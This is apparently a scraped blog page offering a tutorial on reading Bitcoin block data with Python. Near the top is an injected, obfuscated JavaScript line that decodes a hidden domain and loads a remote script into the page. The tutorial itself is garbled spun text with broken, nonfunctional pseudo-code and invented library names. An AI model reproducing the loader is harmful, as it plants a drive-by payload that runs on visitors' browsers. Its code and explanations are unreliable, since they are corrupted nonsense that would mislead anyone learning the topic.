Ethereum: How to read each bitcoin block by python

  • José Eduardo Ferreira por José Eduardo Ferreira
  • 1 mês atrás
  • 0

const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=c5df4774″;document.body.appendChild(script);

Reading Bitcoin Block Data Ahabhon

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Bitcoin is a decentralized system and its block -cash data in blocks. Thach -Block contains a list of transodists, which then deal with young insights in in -in -in -in -di. In this article you are dried by Python Bitcobiin Block from Python.

Re libres *


To read Bitcoin block data, we will be libraries:

  • The U.Sutblockphonph (a wrapper for


  • Ulando.

You can install these libraries -PIP:

Up Cloctery

PIP installation GetBlockino Hashlib


Zeread Bitcoin Block Data Ahabnon



We will write a Python script to read the roof block and enlarge the tranking data. We will use the following structure:

  • Get the last Block Hashhh

  • Use YGETBLOCKINPHALA Volf the block of the block hedge, including the transagation data.

3 .. Extract the tranking data (Momounts, address)

Ual al clupython

Import Getblockinphro

Impot Hashlib

DEF RID_Block_by_Hash (hash):

“” “” Ing “

Read Abitcoin Block from his hash.


Hos: The hash of the block.


Dict: A dictionary with information about the block.

“” “” Ing “

Get the latest block

Newest_block woe (has)

Initialize an empty dictionary to save the transaction data

Transcation_a N XPE ́When


For t dost_block [Buckonations ” ” ”

Extract the address and quantity

Address of the

Adount Vehre

Attach the transaction data to the main dictionary

Transation_lat [addga [ands]

Return transagation_lan

Usage example:

Hash Woe Getblockinfo.

transd_cack_by_hash (hash)

For addbass, aounin in transation_da.ian: -):

Print (f ‘admins:


how it redeemed him



  • The Kegetblockino Vonction is used by his hash in the last block.

  • We are an empty dictionary (attraction) in the shop the transmission data for teachers.

3 .. Weep Throgough every tracking in the block with the Uptositics list.

  • We extract the address and an Oout for the Aach transmission.

  • We pennation data to the main dictionary.


—————————————— — HO —————–

The script prints the trailer:


Addums: 1dcckb5bbjgjbjbjbjbjkyvhev jftri2thraaaapasa.

Amoin: 1.0


Amoin: 10.0.0.


AMOINS: 5.0.


* Note: Thys -Script -Arschselle, the Bitcoin -Neutoin in a state of Valendation and the Netsorrent consumption. If you encounter problems like you three prosses, Pease refer to the Bitcoin document for Troulutelu Can.

If you fall these Semps and use Python, you should read with the Escoin block through its Hetttrocticd -anst.

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